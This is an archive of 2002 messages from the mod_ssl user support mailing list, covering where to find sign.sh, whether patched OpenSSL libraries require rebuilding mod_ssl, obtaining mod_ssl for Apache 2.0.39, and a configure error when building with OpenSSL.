Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 15:53:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27267; Thu, 8 Aug 2002 15:52:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id PAA27263; Thu, 8 Aug 2002 15:51:20 +0200 (MET DST)
Subject: RE: Looking for sign.sh
Date: Thu, 8 Aug 2002 09:51:13 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Message-ID: 
x-mimeole: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
Thread-Topic: Looking for sign.sh
Thread-Index: AcI+4mSA+yufV9jATFi9GE3zwtvtJwAABfXA
From: "Brian F. Vaughan" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA27264
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It should be located in /modssl-x.x.x/pkg.contrib/

Brian Vaughan
IT Administrator


-----Original Message-----
From: Philippe Marsalle [mailto:pmars@free.fr]
Sent: Thursday, August 08, 2002 9:44 AM
To: modssl-users@modssl.org
Subject: Looking for sign.sh


Hi,

I want to sign my own CSR and I don't find sign.sh on my system (
potatoe 2.2.19)
Thanks.

--
Philippe,
      pmars@free.fr



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 16:22:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA28097; Thu, 8 Aug 2002 16:21:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from m7.limsi.fr id QAA28092; Thu, 8 Aug 2002 16:21:09 +0200 (MET DST)
Received: from free.fr (corot-1.limsi.fr [192.44.78.59])
          by m7.limsi.fr (8.9.3/jtpda-5.3.1) with ESMTP id QAA23190
          for ; Thu, 8 Aug 2002 16:22:16 +0200 (MET DST)
Message-ID: <3D527DB7.7A29DF2D@free.fr>
Date: Thu, 08 Aug 2002 16:18:32 +0200
From: Philippe Marsalle 
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.17 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Looking for sign.sh
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Philippe Marsalle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"Brian F. Vaughan" wrote:

> It should be located in /modssl-x.x.x/pkg.contrib/

As it's said in the faq, but locate pkg.contrib nor locate sign.sh give
me a result, ( I run updatedb on my crontab every nigth)
I fetch the latest source on modssl.org and I grab the script.

Best Regards

--
Philippe,
      pmars@free.fr



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 18:03:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00006; Thu, 8 Aug 2002 18:02:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA29995; Thu, 8 Aug 2002 18:01:31 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 964DE4CE765; Thu,  8 Aug 2002 18:01:29 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 18B8E2888B; Thu,  8 Aug 2002 17:57:41 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from m7.limsi.fr id PAA26988; Thu, 8 Aug 2002 15:37:12 +0200 (MET DST)
Received: from free.fr (corot-1.limsi.fr [192.44.78.59])
          by m7.limsi.fr (8.9.3/jtpda-5.3.1) with ESMTP id PAA20706
          for ; Thu, 8 Aug 2002 15:38:20 +0200 (MET DST)
Message-ID: <3D52736B.D966AE7F@free.fr>
Date: Thu, 08 Aug 2002 15:34:35 +0200
From: Philippe Marsalle 
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.17 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: where is sign.h ?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Philippe Marsalle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

All is said in the subject.

Thanks

--
Philippe,
      pmars@free.fr


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 18:03:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00013; Thu, 8 Aug 2002 18:02:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA29987; Thu, 8 Aug 2002 18:01:30 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 21BFE4CE73D; Thu,  8 Aug 2002 18:01:29 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D28BE285C7; Thu,  8 Aug 2002 17:57:48 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp3.hushmail.com id QAA27960; Thu, 8 Aug 2002 16:09:43 +0200 (MET DST)
From: drm@hush.com
Received: from mailserver4.hushmail.com (mailserver4.hushmail.com [64.40.111.27])
	by smtp3.hushmail.com (Postfix) with ESMTP id 681A6596F
	for ; Thu,  8 Aug 2002 07:09:35 -0700 (PDT)
Received: (from nobody@localhost)
	by mailserver4.hushmail.com (8.11.6/8.9.3) id g78E9XM89713;
	Thu, 8 Aug 2002 07:09:33 -0700 (PDT)
	(envelope-from drm@hush.com)
Message-Id: <200208081409.g78E9XM89713@mailserver4.hushmail.com>
To: modssl-users@modssl.org
Subject: recent openssl vulnerabilities
Date: Thu,  8 Aug 2002 07:09:33 -0700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: drm@hush.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Most vendors have supplied patched versions of /usr/lib/libssl.so, etc. They did not provided updates for any packages that use these libraries, such as mod_ssl. Are these unecessary because the new shared object is in place? Or do I need to bug them/compile my own?

Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 19:44:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03354; Thu, 8 Aug 2002 19:43:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA03345; Thu, 8 Aug 2002 19:42:55 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D04B14CE697; Thu,  8 Aug 2002 19:42:54 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 61633285C7; Thu,  8 Aug 2002 19:41:00 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from argaanor.velizy.mgn.net id SAA00078; Thu, 8 Aug 2002 18:03:39 +0200 (MET DST)
Received: from argaanor-gw.velizy.mgn.net (localhost [127.0.0.1])
        by argaanor.velizy.mgn.net (Mail pour MGN) with ESMTP id g78G3bG00010
        for ; Thu, 8 Aug 2002 18:03:37 +0200 (MET DST)
Received: from tigrou.mgn.net (dhcp-143.velizy.mgn.net [192.168.1.143])
        by argaanor-gw.velizy.mgn.net (Mail pour MGN) with ESMTP id g78G3b900006
        for ; Thu, 8 Aug 2002 18:03:37 +0200 (MET DST)
Message-Id: <5.0.2.1.2.20020808174344.05041600@pop.velizy.mgn.net>
X-Sender: tja@pop.velizy.mgn.net
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Thu, 08 Aug 2002 18:06:26 +0200
To: modssl-users@modssl.org
From: Tony Jarriault 
Subject: Apache 2.039
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_7942931==_.ALT"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tony Jarriault 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--=====================_7942931==_.ALT
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: quoted-printable


Hi,

I'm search openssl for Apache 2.039, where can i find it, please ?

Best Regards.

Tony Jarriault
-----------------------------------------------------------------------
Service webmaster : mailto:webmaster@mgn.net
Tel : 01-34-49-06-69
MGN : http://www.mgn.fr
-----------------------------------------------------------------------

Tony Jarriault
mailto:tja@mgn.net
Tel : 01-34-49-06-43
MATRA GLOBAL NETSERVICES
Societ=E9 du groupe PROSODIE
8, rue Grange Dame Rose
78140 V=E9lizy

--=====================_7942931==_.ALT
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


Hi,




I'm search openssl for Apache 2.039, where can i find it, please
?




Best Regards.



Tony Jarriault







-----------------------------------------------------------------------=
=20

Service webmaster :
mailto:webmaster@mgn.net=20

Tel : 01-34-49-06-69=20

MGN :
http://www.mgn.fr=20

-----------------------------------------------------------------------<=
br>




Tony Jarriault=20

mailto:tja@mgn.net=
=20

Tel : 01-34-49-06-43=20

MATRA GLOBAL NETSERVICES

Societ=E9 du groupe PROSODIE

8, rue Grange Dame Rose=20

78140 V=E9lizy=20



--=====================_7942931==_.ALT--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 19:52:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03825; Thu, 8 Aug 2002 19:51:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nova.sti.nasa.gov id TAA03764; Thu, 8 Aug 2002 19:50:35 +0200 (MET DST)
Received: from exchange.w2k.casi.sti.nasa.gov (exchange.w2k.casi.sti.nasa.gov [192.68.52.100])
	by nova.sti.nasa.gov (8.9.1b+Sun/8.9.1) with ESMTP id NAA19733
	for ; Thu, 8 Aug 2002 13:50:36 -0400 (EDT)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23F04.1896AE58"
Subject: RE: Apache 2.039
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Thu, 8 Aug 2002 13:50:34 -0400
content-class: urn:content-classes:message
Message-ID: <55DDBD7541A9894B9F695868B6DFFEED0355E4@exchange.w2k.casi.sti.nasa.gov>
Thread-Topic: Apache 2.039
Thread-Index: AcI/A9qRcA9ziFZ5SU6lJQ1eYW605AAAAAjg
From: "Gregg Andrew" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gregg Andrew" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C23F04.1896AE58
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Openssl.org version 0.9.6e
=20
-----Original Message-----
From: Tony Jarriault [mailto:tjarriault@mgn.net]=20
Sent: Thursday, August 08, 2002 12:06 PM
To: modssl-users@modssl.org
Subject: Apache 2.039
=20
Hi,
=20
I'm search openssl for Apache 2.039, where can i find it, please ?
=20
Best Regards.

Tony Jarriault=20
-----------------------------------------------------------------------=20
Service webmaster : mailto:webmaster@mgn.net=20
Tel : 01-34-49-06-69=20
MGN : http://www.mgn.fr  =20
-----------------------------------------------------------------------
Tony Jarriault=20
mailto:tja@mgn.net=20
Tel : 01-34-49-06-43=20
MATRA GLOBAL NETSERVICES=20
Societ=E9 du groupe PROSODIE=20
8, rue Grange Dame Rose=20
78140 V=E9lizy=20

------_=_NextPart_001_01C23F04.1896AE58
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




















Openssl.org version =
0.9.6e



 



-----Original =
Message-----

From: Tony Jarriault
[mailto:tjarriault@mgn.net] 

Sent: Thursday, August =
08, 2002
12:06 PM

To: =
modssl-users@modssl.org

Subject: Apache =
2.039



 






Hi,






 






I'm search openssl for Apache 2.039, where =
can i find
it, please ?






 






Best Regards.








Tony Jarriault 



----------------------------------------------=
-------------------------




Service webmaster : mailto:webmaster@mgn.net =




Tel : 01-34-49-06-69 =




MGN : http://www.mgn.fr




----------------------------------------------=
-------------------------



Tony Jarriault 



mailto:tja@mgn.net




Tel : 01-34-49-06-43 =




MATRA GLOBAL NETSERVICES =




Societ=E9 du groupe PROSODIE =




8, rue Grange Dame Rose =




78140 V=E9lizy 








=00
------_=_NextPart_001_01C23F04.1896AE58--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 19:55:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03932; Thu, 8 Aug 2002 19:54:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id TAA03926; Thu, 8 Aug 2002 19:53:25 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g78HnsGT018647
	for ; Thu, 8 Aug 2002 13:49:54 -0400
Date: Thu, 8 Aug 2002 13:49:54 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
In-Reply-To: <5.0.2.1.2.20020808174344.05041600@pop.velizy.mgn.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 8 Aug 2002, Tony Jarriault wrote:

> I'm search openssl for Apache 2.039, where can i find it, please ?

I assume you mean mod_ssl, not openssl.  mod_ssl is bundled with Apache
2.0.x -- check your copy of Apache 2.0 and you'll find that it's already
there (caveat: we do not distribute binaries of mod_ssl, only source
code).

OpenSSL is the same regardless of what mod_ssl you use and is available at
www.openssl.org.

--Cliff

PS: Can we PLEASE add this to the FAQ or even the main modssl.org site?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 20:05:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA04568; Thu, 8 Aug 2002 20:04:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sgcmail1.safelite.com id UAA04270; Thu, 8 Aug 2002 20:03:37 +0200 (MET DST)
Received: through eSafe SMTP Relay 1028669463; Thu Aug 08 14:03:30 2002
Received: by sgcmail1.safelite.com with Internet Mail Service (5.5.2650.21)
	id ; Thu, 8 Aug 2002 14:02:53 -0400
Message-ID: 
From: "Xiao, Wei" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 2.039
Date: Thu, 8 Aug 2002 14:02:50 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23F05.CF951CBC"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xiao, Wei" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23F05.CF951CBC
Content-Type: text/plain

When I run configure --with-ssl=$directory_of_open_ssl, it complained that
it can't find ssl toolkit library. Did I do anything wrong?

Thanks.

Wei

-----Original Message-----
From: Cliff Woolley [mailto:jwoolley@apache.org]
Sent: Thursday, August 08, 2002 1:50 PM
To: modssl-users@modssl.org
Subject: Re: Apache 2.039


On Thu, 8 Aug 2002, Tony Jarriault wrote:

> I'm search openssl for Apache 2.039, where can i find it, please ?

I assume you mean mod_ssl, not openssl.  mod_ssl is bundled with Apache
2.0.x -- check your copy of Apache 2.0 and you'll find that it's already
there (caveat: we do not distribute binaries of mod_ssl, only source
code).

OpenSSL is the same regardless of what mod_ssl you use and is available at
www.openssl.org.

--Cliff

PS: Can we PLEASE add this to the FAQ or even the main modssl.org site?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C23F05.CF951CBC
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: Apache 2.039




When I run configure --with-ssl=3D$directory_of_open_ss=
l, it complained that it can't find ssl toolkit library. Did I do anythin=
g wrong?



Thanks.




Wei




-----Original Message-----

From: Cliff Woolley [Sent: Thursday, August 08, 2002 1:50 PM

To: modssl-users@modssl.org

Subject: Re: Apache 2.039






On Thu, 8 Aug 2002, Tony Jarriault wrote:




> I'm search openssl for Apache 2.039, where can i f=
ind it, please ?




I assume you mean mod_ssl, not openssl.  mod_ssl i=
s bundled with Apache

2.0.x -- check your copy of Apache 2.0 and you'll find=
 that it's already

there (caveat: we do not distribute binaries of mod_ss=
l, only source

code).




OpenSSL is the same regardless of what mod_ssl you use =
and is available at

www.openssl.org.




--Cliff




PS: Can we PLEASE add this to the FAQ or even the main =
modssl.org site?




_______________________________________________________=
_______________

Apache Interface to OpenSSL (mod_ssl)   =
;            =
    www.modssl.org

User Support Mailing List     =
;            =
     modssl-users@modssl.org

Automated List Manager     &n=
bsp;           &nb=
sp;          majordomo@modss=
l.org





------_=_NextPart_001_01C23F05.CF951CBC--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 20:19:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA04879; Thu, 8 Aug 2002 20:18:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nova.sti.nasa.gov id UAA04875; Thu, 8 Aug 2002 20:17:11 +0200 (MET DST)
Received: from exchange.w2k.casi.sti.nasa.gov (exchange.w2k.casi.sti.nasa.gov [192.68.52.100])
	by nova.sti.nasa.gov (8.9.1b+Sun/8.9.1) with ESMTP id OAA19858
	for ; Thu, 8 Aug 2002 14:17:24 -0400 (EDT)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23F07.D8225E3E"
Subject: RE: Apache 2.039
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Thu, 8 Aug 2002 14:17:24 -0400
content-class: urn:content-classes:message
Message-ID: <55DDBD7541A9894B9F695868B6DFFEED0355E6@exchange.w2k.casi.sti.nasa.gov>
Thread-Topic: Apache 2.039
Thread-Index: AcI/Bn3a7RTzJ4ObT3SUCjQxV4nj5wAAQYgg
From: "Gregg Andrew" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gregg Andrew" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C23F07.D8225E3E
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Did you use just the base directory, default is /usr/local/ssl, this =
worked for me.
Gregg Andrew
=20
-----Original Message-----
From: Xiao, Wei [mailto:Wei.Xiao@safelite.com]=20
Sent: Thursday, August 08, 2002 2:03 PM
To: 'modssl-users@modssl.org'
Subject: RE: Apache 2.039
=20
When I run configure --with-ssl=3D$directory_of_open_ssl, it complained =
that it can't find ssl toolkit library. Did I do anything wrong?
Thanks.=20
Wei=20
-----Original Message-----=20
From: Cliff Woolley [

------_=_NextPart_001_01C23F07.D8225E3E
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable










RE: Apache 2.039











Did you use just the base =
directory,
default is /usr/local/ssl, this worked for =
me.



Gregg =
Andrew



 



-----Original =
Message-----

From: Xiao, Wei
[mailto:Wei.Xiao@safelite.com] 

Sent: Thursday, August =
08, 2002
2:03 PM

To: =
'modssl-users@modssl.org'

Subject: RE: Apache =
2.039



 



When I run configure
--with-ssl=3D$directory_of_open_ssl, it complained that it can't find =
ssl toolkit
library. Did I do anything wrong?



Thanks. 



Wei 



-----Original Message----- 

From: Cliff Woolley =
[








=00
------_=_NextPart_001_01C23F07.D8225E3E--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 20:21:44 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA04964; Thu, 8 Aug 2002 20:20:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id UAA04904; Thu, 8 Aug 2002 20:19:21 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 3DDC721216; Thu,  8 Aug 2002 11:09:19 -0700 (PDT)
Date: Thu, 8 Aug 2002 11:09:19 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
Message-ID: <20020808180919.GA23684@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Have a look at http://www.apacheworld.org/ty24/site.chapter17.html
That is a chapter I have online that explains step by step how to build
Apache 2 with SSL support. 

> When I run configure --with-ssl=$directory_of_open_ssl, it complained that
> it can't find ssl toolkit library. Did I do anything wrong?
> 
> Thanks.
> 
> Wei
> 
> -----Original Message-----
> From: Cliff Woolley [mailto:jwoolley@apache.org]
> Sent: Thursday, August 08, 2002 1:50 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache 2.039
> 
> 
> On Thu, 8 Aug 2002, Tony Jarriault wrote:
> 
> > I'm search openssl for Apache 2.039, where can i find it, please ?
> 
> I assume you mean mod_ssl, not openssl.  mod_ssl is bundled with Apache
> 2.0.x -- check your copy of Apache 2.0 and you'll find that it's already
> there (caveat: we do not distribute binaries of mod_ssl, only source
> code).
> 
> OpenSSL is the same regardless of what mod_ssl you use and is available at
> www.openssl.org.
> 
> --Cliff
> 
> PS: Can we PLEASE add this to the FAQ or even the main modssl.org site?
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 20:27:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA05138; Thu, 8 Aug 2002 20:26:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sgcmail1.safelite.com id UAA05131; Thu, 8 Aug 2002 20:26:04 +0200 (MET DST)
Received: through eSafe SMTP Relay 1028669463; Thu Aug 08 14:26:09 2002
Received: by sgcmail1.safelite.com with Internet Mail Service (5.5.2650.21)
	id ; Thu, 8 Aug 2002 14:25:45 -0400
Message-ID: 
From: "Xiao, Wei" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 2.039
Date: Thu, 8 Aug 2002 14:25:45 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23F09.02BA2C6A"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xiao, Wei" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23F09.02BA2C6A
Content-Type: text/plain

Thanks.

-----Original Message-----
From: Daniel Lopez [mailto:daniel@rawbyte.com]
Sent: Thursday, August 08, 2002 2:09 PM
To: modssl-users@modssl.org
Subject: Re: Apache 2.039



Have a look at http://www.apacheworld.org/ty24/site.chapter17.html
That is a chapter I have online that explains step by step how to build
Apache 2 with SSL support. 

> When I run configure --with-ssl=$directory_of_open_ssl, it complained that
> it can't find ssl toolkit library. Did I do anything wrong?
> 
> Thanks.
> 
> Wei
> 
> -----Original Message-----
> From: Cliff Woolley [mailto:jwoolley@apache.org]
> Sent: Thursday, August 08, 2002 1:50 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache 2.039
> 
> 
> On Thu, 8 Aug 2002, Tony Jarriault wrote:
> 
> > I'm search openssl for Apache 2.039, where can i find it, please ?
> 
> I assume you mean mod_ssl, not openssl.  mod_ssl is bundled with Apache
> 2.0.x -- check your copy of Apache 2.0 and you'll find that it's already
> there (caveat: we do not distribute binaries of mod_ssl, only source
> code).
> 
> OpenSSL is the same regardless of what mod_ssl you use and is available at
> www.openssl.org.
> 
> --Cliff
> 
> PS: Can we PLEASE add this to the FAQ or even the main modssl.org site?
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C23F09.02BA2C6A
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: Apache 2.039




Thanks.




-----Original Message-----

From: Daniel Lopez [mailto:daniel@rawbyte.com]

Sent: Thursday, August 08, 2002 2:09 PM

To: modssl-users@modssl.org

Subject: Re: Apache 2.039








Have a look at http://www.apacheworld.org/ty24=
/site.chapter17.html

That is a chapter I have online that explains step by =
step how to build

Apache 2 with SSL support. 




> When I run configure --with-ssl=3D$directory_of_op=
en_ssl, it complained that

> it can't find ssl toolkit library. Did I do anyth=
ing wrong?

> 

> Thanks.

> 

> Wei

> 

> -----Original Message-----

> From: Cliff Woolley [mailto:jwoolley@apache.org]

> Sent: Thursday, August 08, 2002 1:50 PM

> To: modssl-users@modssl.org

> Subject: Re: Apache 2.039

> 

> 

> On Thu, 8 Aug 2002, Tony Jarriault wrote:

> 

> > I'm search openssl for Apache 2.039, where c=
an i find it, please ?

> 

> I assume you mean mod_ssl, not openssl.  mod=
_ssl is bundled with Apache

> 2.0.x -- check your copy of Apache 2.0 and you'll=
 find that it's already

> there (caveat: we do not distribute binaries of m=
od_ssl, only source

> code).

> 

> OpenSSL is the same regardless of what mod_ssl yo=
u use and is available at

> www.openssl.org.

> 

> --Cliff

> 

> PS: Can we PLEASE add this to the FAQ or even the=
 main modssl.org site?

> 

> _________________________________________________=
_____________________

> Apache Interface to OpenSSL (mod_ssl)  =
            &=
nbsp;    www.modssl.org

> User Support Mailing List    =
            &=
nbsp;     modssl-users@modssl.org

> Automated List Manager    &nb=
sp;           &nbs=
p;           majordomo@=
modssl.org

______________________________________________________=
________________

Apache Interface to OpenSSL (mod_ssl)   =
;            =
    www.modssl.org

User Support Mailing List     =
;            =
     modssl-users@modssl.org

Automated List Manager     &n=
bsp;           &nb=
sp;          majordomo@modss=
l.org





------_=_NextPart_001_01C23F09.02BA2C6A--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 20:27:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
